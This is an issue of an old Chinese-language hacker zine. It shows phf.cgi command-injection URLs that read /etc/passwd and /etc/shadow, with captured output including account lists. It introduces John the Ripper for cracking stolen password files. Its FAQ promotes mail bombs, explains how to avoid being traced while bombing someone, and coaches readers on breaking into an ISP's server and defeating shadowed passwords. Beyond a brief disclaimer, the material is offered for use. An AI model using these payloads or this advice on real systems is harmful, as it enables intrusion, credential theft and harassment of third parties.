CoolHC Volume 6 By CoolFire Author E-Mail: [email protected]
这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果 你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写 这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password 若有人因此文件 导致恶意入侵别人的电脑或网路, 本人概不负责 !!
在昨天, 我们的首页造访人数破万了~~ 应该是增加了很多人, 而不是有人故意灌水的吧? 希望新 朋友们能喜欢我们的内容, 有人问到: 有没有跟我们首页性质相近的中文站台? 很遗憾的是目前 我还没有找到…. 看得到的大多是软体, 注册机之类的破解站台. 如果你也有这样的站台的话, 欢迎你写信给我们进行连结. 有很多网友报怨档案抓不下来, 先前我们已经尽了很大的努力将档 案放在国内 Server 中, 我想, 由 HiNet 连这边应该很快吧? 还是水管塞住的问题?? 如果有人 的位址在 .edu.tw 附近的, 欢迎来信要求 Mirror~~ 我很乐意将档案 Mirror 给你, 让其它网友更方便取这些档案.
好久没有再弄出一些文章出来了, 不过最近倒是回了蛮多关於 Hacker 方面的问题, 也收到了许多 的回应信件, 有许多的问题在这一篇文章中都会有答案, 甚至到现在还有很多的网友们询问甚么 是 shadow password 的, 请各位多翻翻以前的文章吧!! 在 CGI Holes 方面的问题也很多, 所以在这一篇之後我会找个时间写一写 System Holes #2 来让大家对一些网路上常见的程式漏洞有一些基 本的认识.
最近有许多软体更新了, 最令我们注意的当然就是 NT 4.0 罗, 因为它的更新肯定会带来很多的 人更新系统, 当然这样先进的作业系统我们还是很期待有人会很快的将它的 Bugs 找出来的啦!! UpYours 这套重量级的 MailBomb 也出现的新的版本, 这次的 V4.0 Beta 2 经试用後发现实在是 改进了很多, 但是相对的危险性也跟著提高, 其改用 Delphi 来设计, 使得安装更为方便, 不过 美中不足的是 beta2 的版本有些功能尚未改好, 光看到功能就让人哈翻了~~:) 这套 beta2 的版 本目前在我们的首页上可以找得到, 相信它的正式版本很快就会完成~~
关於 MailBomb: 我们的首页上所提供的 MailBomb 仅供大家作为测试用, 请勿拿来开玩笑或是对别人 的信箱进行轰炸, 日前此类事件造成某些的 ISP 当机, 慎至还有导致 Mail Server 记忆体不足的情况 (哪个人这么狠??), 我们也发现最近网路越来越慢了, 因为水管上积了太多要跟我们抢宽度的垃圾 信件. 请大家以学习的心来使用这些 Bombs… 不要没事就拿来炸人好吗 ?? Then enjoy new one~
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
[CGI Hole (phf.cgi) 的延伸]
这次的主题想了好久, 一直都没有想到, 不过日前有一个屋漏偏逢连夜雨的某国营事业, 在几经下X雨 及漏X的风波之後, 在他们的主机上发现了很好玩的状况, 原本我们在使用 phf.cgi 来抓 /etc/passwd
的时候, 在 Browser 的 Location 中是下:
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
root:x:0:1:0000-Admin(0000):/:/sbin/sh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nadm:x:45:2::/usr/bin:/sbin/sh
iuucp:x:46:5::/usr/lib/uucp/uucico:/sbin/sh
nobody:x:60001:60001:uid no body:/:
noaccess:x:60002:60002:uid no access:/:
gopher:x:100:1::/usr/local/bin:/usr/local/bin/GopherUserScript
news:x:105:100::/usr/local/etc/innd:/usr/lib/rsh
ftp:x:106:101:Anonymous FTP:/export/ftp:/bin/false
hanshin:x:109:1::/home1/hanshin:/usr/lib/rsh
dayeh:x:110:1::/home1/dayeh:/usr/lib/rsh
ming:x:133:1::/home1/ming:/usr/bin/ksh
charlesl:x:139:1::/home1/charlesl:/usr/lib/rsh
iiimail:x:142:6::/home/iiimail:/usr/lib/rsh
charles.lo:x:156:1::/home1/charles.lo:/usr/lib/rsh
webmaster:x:161:1::/home1/webmaster:/usr/lib/rsh
mark:x:171:1::/home1/mark:/usr/lib/rsh
jcteam:x:172:1::/home1/jcteam:/usr/lib/rsh
ibgchen:x:224:1::/home1/ibgchen:/usr/lib/rsh
但是如果没有, 或是 shadow 的话, 你可能会接著试:
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/shadow
但是有时候虽然 phf.cgi 这个程式的漏洞没有被补上, 还是有很多的机器不理会这个指令, 不过当这 个指令生效, 但是你看到的却是一个 shadow 过的 passwd 的时候, 请不要灰心, 因为这台机器已经在 你的手中了, 为甚么呢 ?? 我们来玩看看一些简单的 Unix shell command 你就会知道了~~
http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20-l%20-a%20/etc
Query Results
/usr/local/bin/ph -m alias=x /bin/ls -l -a /etc
total 466
-rw-r–r– 1 root root 38 May 2 1996 #etcnamed.boot#
-rw-r–r– 1 root root 20579 May 1 1996 #sendmail.cf#
drwxr-xr-x 11 root root 2048 Apr 17 13:07 .
drwxr-xr-x 24 root root 1024 Mar 26 08:16 ..
-rw-r–r– 1 root root 2167 Aug 24 1995 DIR_COLORS
-rw-r–r– 1 root root 15 May 1 1996 HOSTNAME
-rw-r–r– 1 root root 4 Feb 24 1993 NETWORKING
-rw-r–r– 1 root root 48 Dec 30 1994 NNTP_INEWS_DOMAIN
-rw-r–r– 1 root root 0 May 13 1994 at.deny
drwxr-xr-x 2 root root 1024 Apr 11 1996 backups
-rw-r–r– 1 root root 1212 Jul 10 1993 bootptab
-rw-r–r– 1 root root 0 Feb 15 1994 csh.cshrc
-rw-r–r– 1 root root 893 Apr 12 1996 csh.login
drwxr-xr-x 2 root root 1024 Apr 16 1996 default
-rw-r–r– 1 root root 154 Aug 21 1994 exports
-rw-r–r– 1 root root 0 May 13 1995 fastboot
-rw-r–r– 1 root root 1118 Jan 28 1994 fdprm
drwxr-xr-x 2 root root 1024 Apr 12 1996 fs
-rw-r–r– 1 root root 250 Dec 9 19:19 fstab
-rw-r–r– 1 root root 242 Dec 5 13:55 fstab~
-rw-r–r– 1 root root 1915 Jan 27 07:46 ftpaccess
-rw-r–r– 1 root root 368 Aug 1 1994 ftpconversions
-rw-r–r– 1 root root 0 Aug 9 1994 ftpgroups
-rwxr-xr-x 1 root root 50 May 1 1996 ftponly
-rw-r–r– 1 root root 501 Apr 26 1996 ftpusers
-rw-r–r– 1 root root 76 Aug 21 1994 gateways
-rw-r–r– 1 root root 669 May 19 1994 gettydefs
-rw-r–r– 1 root root 291 Jun 6 1996 group
-rw-r–r– 1 root root 27 Jul 7 1994 host.conf
-rw-r–r– 1 root root 628 Jul 12 1996 hosts
-rw-r–r– 1 root root 600 Jan 6 10:18 hosts.allow
-rw-r–r– 1 root root 341 May 9 1996 hosts.deny
-rw-r–r– 1 root root 313 Mar 16 1994 hosts.equiv
-rw-r–r– 1 root root 302 Sep 23 1993 hosts.lpd
-rw-r–r– 1 root root 653 Apr 24 1996 hosts~
lrwxrwxrwx 1 root root 1 Apr 12 1996 inet -> .
-rw-r–r– 1 root root 3677 Jan 6 10:20 inetd.conf
-rw-r–r– 1 root root 3664 Apr 23 1996 inetd.conf~
-rw-r–r– 1 root root 2351 Apr 18 1996 inittab
-rw-r–r– 1 root root 2046 Jul 28 1994 inittab.gettyps.sample
-rw-r–r– 1 root root 27 Apr 17 12:43 issue
-rw-r–r– 1 root root 3 Apr 17 12:43 klogd.pid
-rw-r–r– 1 root root 1223 Apr 17 12:43 ld.so.cache
-rw-r–r– 1 root root 71 Aug 14 1995 ld.so.conf
drwxr-xr-x 2 root root 1024 Apr 12 1996 lilo
-rw-r–r– 1 root root 479 Apr 13 1996 lilo.conf
-rw-r–r– 1 root root 479 Apr 13 1996 lilo.conf.bak
-rw-r–r– 1 root root 266 Apr 17 12:42 localtime
-rw-r–r– 1 root root 76873 Oct 17 1995 magic
-r–r–r– 1 root root 105 May 8 1994 mail.rc
-rw-r–r– 1 root root 14 Apr 17 12:43 motd
drwxr-xr-x 2 root root 1024 Aug 1 1994 msgs
-rw-r–r– 1 root root 151 Apr 17 20:43 mtab
-rw-r–r– 1 root root 833 Jun 29 1994 mtools
-r–r–r– 1 root root 974 Apr 17 11:48 named.boot
-r–r–r– 1 root root 2568 May 2 1996 named.boot,v
-r–r–r– 1 root root 764 Mar 8 16:54 named.boot.v1
-r–r–r– 1 root root 813 Mar 17 08:45 named.boot.v2
-r–r–r– 1 root root 521 Apr 18 1996 named.boot.~1.3~
-r–r–r– 1 root root 566 Apr 19 1996 named.boot.~1.4~
-r–r–r– 1 root root 566 Apr 19 1996 named.boot.~1.5~
-r–r–r– 1 root root 707 Mar 5 08:32 named.boot.~1.6~
-rw-r–r– 1 root root 566 Apr 19 1996 named.boot~
-rw-r–r– 1 root root 235 May 1 1996 networks
-rw-r–r– 1 root root 237 Apr 24 1996 networks~
-rw-r–r– 1 root root 0 May 8 1995 nntpserver
-rw-r–r– 1 root root 36 Sep 12 1994 organization
-rw-r–r– 1 root root 1727 Apr 17 13:07 passwd
-r–r–r– 1 root root 1662 Apr 17 13:06 passwd-
-rw-r–r– 1 root root 1715 Apr 17 13:06 passwd.OLD
-rw-r–r– 1 root root 1494 Feb 12 14:22 passwd.old
-rw-r–r– 1 root root 1354 Jun 6 1996 passwd~
drwxr-xr-x 2 root root 1024 Jul 9 1994 ppp
-rw-r–r– 1 root root 2240 May 20 1994 printcap
-rw-r–r– 1 root root 1083 Apr 12 1996 profile
-rw-r–r– 1 root root 595 Aug 21 1994 protocols
drwxr-xr-x 2 root root 1024 Jan 3 23:59 rc.d
-rw-r–r– 1 root root 41 May 1 1996 resolv.conf
-rw-r–r– 1 root root 65 Jan 31 1996 resolv.conf~
-rw-r–r– 1 root root 743 Aug 1 1994 rpc
-rw-r–r– 1 root root 87 Jun 6 1996 securetty
-r–r–r– 1 root root 20579 May 1 1996 sendmail.cf
-r–r–r– 1 root root 21332 May 1 1996 sendmail.cf,v
-rw-r–r– 1 root root 20541 Apr 13 1996 sendmail.cf~
-rw-r–r– 1 root root 408 Apr 25 17:17 sendmail.st
-rw-r–r– 1 root root 5575 Aug 1 1994 services
-rw-r–r– 1 root root 68 Jun 6 1996 shells
drwxr-xr-x 3 root root 1024 Nov 13 1994 skel
-rw-r–r– 1 root root 314 Jan 10 1995 slip.hosts
-rw-r–r– 1 root root 342 Jan 10 1995 slip.login
-rw-r–r– 1 root root 455 Aug 1 1994 snooptab
-rw——- 1 root users 524 Jul 18 1996 ssh_host_key
-rw-r–r– 1 root users 327 Jul 18 1996 ssh_host_key.pub
-rw——- 1 root users 512 Mar 10 09:03 ssh_random_seed
-rw-r–r– 1 root users 607 Jul 18 1996 sshd_config
-rw-r—– 1 root root 501 Apr 26 1996 syslog.conf
-rw-r–r– 1 root root 3 Apr 17 12:43 syslog.pid
-rw-r–r– 1 root root 183942 Aug 9 1995 termcap
-rw-r–r– 1 root root 126 Nov 24 1993 ttys
lrwxrwxrwx 1 root root 13 Apr 12 1996 utmp -> /var/adm/utmp
drwxr-xr-x 2 root root 1024 Aug 25 1995 vga
lrwxrwxrwx 1 root root 13 Apr 12 1996 wtmp -> /var/adm/wtmp
-rw-r–r– 1 root root 76 May 8 1995 yp.conf.example
lrwxrwxrwx 1 root root 7 Apr 12 1996 zprofile -> profile
上面的 %20 所代表的是 [Space] 也就是空白键啦! 那上面这个 Location 就如同我们已经 Telnet 到 这台机器上, 下了: ls -l -a /etc 这个指令一样, 嗯… 也就是说….$^^*^$@@# OK! 当你抓 /etc/passwd 所抓到的是 shadow 过的 passwd 档, 你一定会要抓真正的 shadow 档来作 “配对” 的动作… 所以呢, 下了 ls 指令来找找看到底真的 shadow 是藏在哪里, 当然你可以看的不 只是 /etc 这个目录, 任何目录你都可以看, 当然你可以使用的也不只是 cat 及 ls 这两个指令, 你 可以用更多的指令~~ 那么还有甚么作不到的呢 ??? 我想可能还是有很多哩~~ 因为 phf.cgi 好像只 把你所下的指令丢给 shell 後直接拦下它输出的结果, 也就是如果像是 /bin/passwd userid 这样的 指令就不能用~ 因为它会要等你输入下一个字串~~ 除非先写入一个档案, 然後用来代入 “<“.. 嗯.. 最近很忙, 没有空作这些无聊事, 不过 phf.cgi 还真的蛮好玩的, 我已经试了好几台机器都可以看到 文件内容及档案, 目录… 当然~ 没有破坏就是了~~
经过这样的说明, 你是不是有些 Idea ?? 还是记起以前有试过其它的机器的 phf.cgi 也可以这样子 玩的 ?? 嗯~ 再连过去玩玩看吧! 发挥一下你的想像力~~ /etc/passwd 很容易就可以得手的喔~~ 对 了~ 不要乱搞政府机关 or 你们的学校啦!!~~
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
[Crack 工具介绍] John the Ripper V1.4 [Size:743K]
记得先前一直介绍大家使用 CJack V1.4 来破解密码档, 那是因为它 “够快”, 在 Encrypt 的速度及 比对的速度上实在快了很多, 但是之後由於很多网友的作业环境是在 Windows 95 之下, 所以 Jack 不能跑, 我们就介绍大家使用 John the Ripper V1.1 这个 Passwrod Cracker~ 现在这套 Cracker 出了新的版本了, 经过我们的试用觉得应该好好的为它介绍一番, 原来一直声称速度上比 CJack14 还要快的 John, 经过实际上的测试, 总感觉速度没有 Jack 来得快, 虽然作者声称是因为他们这支 程式是以 486 机器作最佳化的, 在 386 上跑起来会比较慢, 但是旧的 V1.1 实在是比 Jack 还要慢 这也是大家都看得到的事实.
而 1.4 版在 EnCrypt 上实在是下了点功夫, 也对 Win32 版本有了支援, 当你下载解开後会发现里 面有 DOS.ZIP WIN32.ZIP SOURCE.TGZ 这三个档, 分别是在 DOS 下使用的版本, Win95,NT 下使用的 版本及 Unix 下使用的版本, 这时针对你所运用的作业环境作个选择, 将档案解开即可直接使用.
你还要再解开 COMMON.ZIP(共用档) 及 DOC.ZIP(说明档), 经过测试速度上明显提升很多, 但是我不 敢讲它比 Jack 要快多少, 至少在我的 Pentium 133 的机器上跑起来觉得差不多, 也没有谁比较快 谁比较慢的感觉~~ 不过以这样的档案大小 (7xxK) 能同时包含三种作业系统, 实在是不错的选择!!
当然这个程式里面只含了一个小小的字典档供你测试, 想要发挥它最大的效能还是先要有一个不错的 字典档, 但是新的版本中可以让你设定自动产生序数及字串比对(之前的好像也有吧?), 至於如何操 作, 我想他跟 Jack 及前一版本的操作方法相同, 就不用再多作介绍了~~ 以下是它的执行画面:
John the Ripper Version 1.4 Copyright (c) 1996,97 by Solar Designer
Usage: john [flags] [passwd files]
Flags: -pwfile:<file>[,..] specify passwd file(s)
-wordfile:<file> -stdin wordlist mode, read words from <file> or stdin
-rules enable rules for wordlist mode
-incremental[:<mode>] incremental mode [using john.ini entry <mode>]
-single single crack mode
-external:<mode> external mode, using john.ini entry <mode>
-restore[:<file>] restore session [from <file>]
-makechars:<file> make a charset, <file> will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:<login|uid>[,..] crack this (these) user(s) only
-shells:[!]<shell>[,..] crack users with this (these) shell(s) only
-salts:[!]<count> crack salts with at least <count> accounts only
-lamesalts assume plaintext passwords were used as salts
-timeout:<time> abort session after a period of <time> minutes
-list list each word
-beep -quiet beep or don’t beep when a password is found
-noname -nohash don’t use memory for login names or hash tables
-des -md5 force DES or MD5 mode
有没有看到最後一行? 有 MD5 mode 的支援了哩~~~
嗯.. 介绍完了! 当然! 这支程式我们也传回来了, 你可以在我们的首页找到, 或者你也可以试 者 archie 看看有哪些 ftp site 有, 它的档名是 ucfjohn3.zip ENJOY~
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
**** CoolFire FAQ ****
许多东西没有空整理, 但是还是收集了一部分的问答出来, 如果这边有的就不要再来信询问了喔!!
[Q0]我抓了 KOS 但是抓到 1.2MB 左右就停了, 不晓得哪里还可以抓到.
[A0]如果你是想要我们站上 KOS 中的字典档, 那么很报歉, 因为这东西只有本站的 KOS 中有包, 在别的地方抓到的 KOS 不含我们这个字典档 (这是我们自己加料过的, 其它程式相同), 这也 是为甚么首页上的 KOS 如此大了~ 如果你所要的是 KOS 的程式, 那么你可以到 www.yahoo.com 这个搜寻引擎中找 “globalkos” 这个字串, 会有很多地下站台的列表, 接著你就可以在这些地 方找一个连线速度较快的主机抓取 KOS 了~~
[Q1]我尝试用 NETTERM 及 LetMeIn 进入自己所建立的纟统(SCO Unix V).
1. 因为帐号是本人的,所以我将密码放於在字典档第三行内.
2. 在LetMeIn中选定我的字典档.
3. 在NETTERM中输入我的帐号,然後按输入键.
4. 在Password 的出现後回到LetMeIn.
5. 按Start Break.
6. 当Delay Time到了,键盘上的”NumLock”闪过不停,
不过,过了第三行(猜想 … 很久)也没有反应.老是停在Password这个浮标傍.
7. 当再选LetMeIn後看见字典档内的字逐一出现於最低的行内.
这好像没有按输入键.
请替我解答,可以么?
还想问问在那里可找到新的LetMeIn 及ClayMore版本
多谢帮忙.
[A1]
1. 连上主机, 待 user: 出现时不用输入你的 user id.
2. 启动 LetMeIn 1.0 选定字典档
3. 在 Setup Keys 中输入你的 User ID 并加上一个 ‘~’ 号(代表 Enter
4. 在 After Keys 中输入 ‘~’ 号, 表示密码输入完也要按 Enter.
5. 按下 Start Break, 在时间倒数完毕前将滑鼠点一下 telnet (Netterm)
程式视窗, 等待自动输入~~~~ 🙂
ps… 以上.. 更正一下你的操作方式, 并请如果弄懂了 LetMeIn 的操作
方式时帮我写一下说明… 因为有太多人的操作都错了~~ 不晓得是不
是我的说明写得太差了哩 ??? LetMeIn 及 ClayMore 目前都未出新版本,
LetMeIn 2.0 的赶工还在加强中 (有 TCP/IP 部分的支援).
***
[Q2]我download了kabomb3.0,但又怕给查出来…我在网上有一个很嚣张的敌人呢!
[A2]KaBoom 3.0 经测试无法 Fake IP, 所以很可能会被查出来~~~ 不过要看 isp 配
不配合抓~~~ 也就是说因为拨接是动态 Ip, 较不容易查出(需透过 ISP)…但是如
果是假借它人帐号拨接, 又要看电信局配不配合抓了.
[Q3]那么有没有完全不会被查出的email bomber呢?∶-)
[A3]Windows 上的 AnonyMailer 就是了~~ 但没有强大的炸人功能~~ 用途为发一般
之匿名信件, 或是你可找 Unix 上的Bomb Script..在 Unix 上炸… 再不.. 就试
装 UpYours 罗~:)
***
[Q4]I can’t get the email bomb files except the kabomb..Can you help me
solve this problem?
[A4]You can download it from my site. If there’s some problem, you can mail me~
***
[Q5] I trust that the GlobalKOS just down ..so I can get the KOS crack
files. Can you tell where I can get or put the file in your homepage?
Thanks you for you attention..
[A5]对~ 经过连结测试该 Server 好像已经没有回应了, 目前已将 Global KOS 档
案整理好放置於首页上供大家下载, 原先是遵重作者的反应不得放连结的, 现
在由於该 Server 停掉了, 所以就将档案放上来罗~ 快抓吧!
***
[Q6]ShaDow 系唔系唔可以解o架 !? 有o既话用边个程式呀 ? 点样先可以做到呢 ?
[A6]You can use deshadow like program to De-Shadow the shadowed file.
Or you can use ‘ypcat ‘ command to view the shadowed file.
But almost ISP have been fix the hole. Good Luck.
[Q7]我个ISP 用 SUN/OS , D Sercuity 好劲o架 ! 我想睇 D档案时 , 会出现
Permission Denied , 我咪用 More / Less ! 然後用 ftp 想睇 , 用<!cat>
又唔准 ! get file 都唔得 ! 我知 个Passwd 档摆系边都罗唔到 ! 请问
你又有无办法去罗 个档案啊 !
[A7]SUN OS ?? You should to check that system again and tell me what version
is it ? And you should check what ftp deamon and what http deamon and
sendmail version. You should check everything about that server and try
to found every hole would be in that system. And try to get into the system.
After you get in. get more information from that server.
[Q8]我系你度罗o左个Guess Cracking Program ! 不过我都系唔知点样用 ! 我Upload
晒所有档案上去ISP Server 度 ! 然後就按 cc -o guess getpwdent.c <-例如 就
话我D规格错误 ! 搅到我用唔到 !
[A8]some ISP did not support c compiler function. So you should check about it.
[Q9]点样o既档案先可以系 SUN / OS 度用嫁 ? 我搅o黎搅去都整唔到执行档 ! 咪就系
Guess 个程式罗 !
[A9]Sun OS always use shadow program. And the shadowed file may not found in
/etc directory, And may called ‘.shadow’. try found it in other directory.
[Q10]Global Kos 个Server 系咪有问题啊 ? 我上极去都上唔到啊 ! 如果唔介意可唔可以
Attach个档案俾我啊 ?
[A10]There’s a little problem to that server. and i think it have been shut-down
a while. So i will be put the program in my home page.
[Q11]Crack Jack 1.4 系唔系可以系 Sun/Os Or Unix 度用o架 ? 我有个朋友叫我用 系个
Server 做Crack Password ! 但系我就唔知点样可以用DOS o既 *.exe 档系SUN/Os OR
UNIX 度执行 !
[A11]CJack is running under dos mode. And it could not run under unix mode.
So if you want crack some password file. FTP it and put it into a dos OS
machine. Run CJack! 当然如果你坚持要在 Unix 系统下跑的话, 还是有这种软体
的, 最近新版的 John the Ripper V1.4 就有附 Source Code 可以让你在你的主机
上面 Compiler…. 但前提是你必须要有 c compiler 的权限呀~~ 快找一台机器吧!
***
[Q12]我对hacker这门课有些兴趣(虽然我一窍不通:-P ).想请教您几个问题:
我使用 ” John the Ripper V1.0 ” 来crack一个名叫 “passwd”的密码档,
但是很奇怪的,我执行後,显示了一些字,就跳回DOS了.好像根本没有执行crack的动作.
您能帮小弟找出原因吗?
画面如下:
C:Hacker>john -beep -w:123.txt passwd
John the Ripper Version 1.0 Copyright (c) 1996 by Solar Designer
Loaded 0 accounts with 0 different salts
C:Hacker>
123.txt是”字典档”(其实是四,五十个ID); passwd则是我们的”目标:密码档.
[A12]很正确的指令, 不过 0 accounts with 0 different salts 就有点怪了~~~
据我的判断你的 passwd 档是 shadow 过的档, 没有用~~~~ 所以 John 找不到
“有效的” 资料来判读~~~ 新版的 John 有一个 UnShadow.exe 的档案, 据说可
用来组合 shadow 及 passwd 使其还原, 不过前提还是要两个档都抓到, 如果
只抓到一个档是没有用的!! 记得上次有个软体声称其注册版可以解 shadow..
应改也是必需要先抓到 shadow 档吧!~~ 不过这好像没有甚么意义呀~~
[Q13]您听过一个叫: LANWATCH 的软体吗? 我听说它可以:过滤(拦截)Internet上的封包
资料,并可”监视”使用者的一举一动?! 哇!!!太帅了!您有它的相关资料吗?
[A13]No~~ 没玩过~~ 不过你是用拨接上线吗 ??? 那就别想了~~~~:)
[Q14]我这里有个 浏览器的Bomb(用java写的).据我自己(太牺牲了…)的测试,不论你是
用Netscape或MSIE, 它都会让你的浏览器一直重复开很多个视窗,直到记忆体耗完
为止!!! 😛 不知您有无兴趣想要看看?
[A14]我也有个可 FORMAT C: 的 JAVA… 不过没用就是了~~ 哈哈~ 这种东西少玩….
我宁愿多破几间站台~~~ 嘻::::::: 快把 Java Option 关掉吧! 免得以後看我的
Page 会 Formatting ?? <– 开玩笑啦~~~
***
[Q15] 感谢您在网页上的资讯造福了我们这些刚入门的新手 ^_^
根据您提供的方法,成功的取得 Linux.xxxxxxx.xxxx.xxx.tw 的 /etc/passwd 并找出 n 个 password ….. 但我在 tknet.tku.edu.tw 却碰了大钉子 …:(
他们的 /etc/passwd 是 shadows 的, 我猜真正的 password 可能在/etc/master.passwd
, 但我没权限读取它 …. 经尝试了您网页提供的 3 个 Unix & Linux 的漏洞仍无效.
不知您有没有方法解决被 shadow 的 passwd….??
提供一个帐号您可进去看 … login: ****** password: **** (这是淡大的密码格
式: 4位数字) 另,在 bbs 的 security 版有人提出现在的 www cracker 法:
www.xxx.xxx/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd 问题是出在 phf , 您知不 知道他的意思?
[A15] phf 的漏洞是在於 phf 本身自己的 Bug, 它并不会检查你的 UID, 且它执行了 system() 这个指令, 所以我们就可以利用它来作一些只有 root 才可以作的一些事情, 这是一个很 大的漏洞, 现在很多 ISP 都已经将此漏洞补上了~~~~ 这一篇文章中的说明应该就很清楚了吧??